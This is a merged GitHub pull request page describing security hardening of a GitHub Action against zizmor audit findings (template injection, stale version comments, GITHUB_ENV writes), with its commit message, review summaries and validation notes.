Fix: Resolve zizmor security audit findings#164
Merged
ModeSevenIndustrialSolutions merged 1 commit intoJun 19, 2026
Merged
Conversation
Copilot started reviewing on behalf of
ModeSevenIndustrialSolutions
June 18, 2026 15:03
View session
There was a problem hiding this comment.
Pull request overview
Hardens this repository’s composite GitHub Action and its CI workflow to address zizmor security audit findings, primarily by reducing expression/template injection risk in run: scripts and tightening checkout credential persistence.
Changes:
- Routes user-controlled
${{ inputs.* }}expansions through step-levelenv:and uses quoted shell variables inrun:steps. - Adds targeted
zizmor: ignore[github-env]annotations whereGITHUB_ENVwrites are intended and (per comments) validated. - Updates pinned-action version comments and disables credential persistence for
actions/checkoutin the testing workflow.
Reviewed changes
Copilot reviewed 2 out of 2 changed files in this pull request and generated 9 comments.
| File | Description |
|---|---|
action.yaml |
Refactors input handling to reduce script-source interpolation risks; adds zizmor ignore annotations and updates pinned-action comments. |
.github/workflows/testing.yaml |
Hardens actions/checkout usage by setting persist-credentials: false and updates a pinned-action comment. |
💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.
6369dbf to
b8dce43
Compare
Copilot started reviewing on behalf of
ModeSevenIndustrialSolutions
June 19, 2026 03:40
View session
Harden the composite action and testing workflow against
High-severity and Medium-severity zizmor findings:
- template-injection: route ${{ inputs.* }} and other expansions
through step-level env: blocks and reference them as quoted
shell variables, preventing expression injection into run:
scripts.
- ref-version-mismatch: correct stale version comments on pinned
actions (setup-uv -> v8.2.0, actions/cache -> v5.0.5) so they
match the commit the SHA actually points to.
- github-env: the values persisted to GITHUB_ENV are action-
internal and validated before being written (the action already
guards against env-file injection); they are env-by-nature and
carry scoped, justified ignores.
Also address review feedback:
- drop the redundant INPUTS_* env entries an autofix introduced
(including INPUTS_X, an undeclared input). The steps consume the
INPUT_* variables; the duplicate INPUTS_* names were unused and
confusing.
- reword the in-script justification comments to name the GitHub
Actions expression form (e.g. inputs.path_prefix) instead of
bash-style ${INPUTS_X} placeholders. The literal ${{ ... }}
token is deliberately avoided inside run: comments because the
runner would interpolate it -- the very vector being mitigated.
Confirmed clean with zizmor (0 High/Medium findings remaining).
Co-authored-by: Claude <claude@anthropic.com>
Signed-off-by: Matthew Watkins <mwatkins@linuxfoundation.org>
b8dce43 to
42518b2
Compare
Copilot started reviewing on behalf of
ModeSevenIndustrialSolutions
June 19, 2026 03:49
View session
askb
approved these changes
Jun 19, 2026
4129c28
into
lfreleng-actions:main
27 checks passed
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
Hardens the composite action and testing workflow against all High and Medium
zizmorfindings (19 High + 2 Medium before this change, 0 after).Changes
template-injection(High): Inaction.yamland.github/workflows/testing.yaml, route${{ inputs.* }}and other expansions through step-levelenv:blocks and reference them as quoted shell variables, preventing expression injection intorun:scripts.ref-version-mismatch(2 Medium): Correct stale version comments on pinned actions so they match the commit the SHA actually points to (verified against GitHub):astral-sh/setup-uv@fac544c…→# v8.2.0(was# v7.2.0)actions/cache@27d5ce7…→# v5.0.5(was# v4.0.2)github-env(14 High): The values persisted toGITHUB_ENVare action-internal and are validated before being written — the action already guards against env-file injection (see the boolean / path /pytest_args/ coverage validation steps). They are env-by-nature (consumed as environment variables by later steps), so each carries a scoped, inline-justified# zizmor: ignore[github-env].Validation
pre-commit (
actionlint,yamllint,reuse,gitlint) passes.This branch was cut from the latest
upstream/main.Co-authored-by: Claude claude@anthropic.com